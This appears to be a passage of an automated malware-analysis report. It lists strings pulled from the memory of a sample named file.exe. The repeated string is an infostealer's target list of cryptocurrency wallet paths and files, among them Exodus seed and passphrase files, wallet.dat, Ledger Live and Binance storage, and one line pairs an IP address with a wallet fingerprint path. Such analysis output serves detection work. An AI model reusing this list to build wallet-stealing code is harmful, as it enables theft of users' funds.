Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2623849094.000000000163F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 77.91.77.81\user\AppData\Roaming\Binance\.finger-print.fp
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda 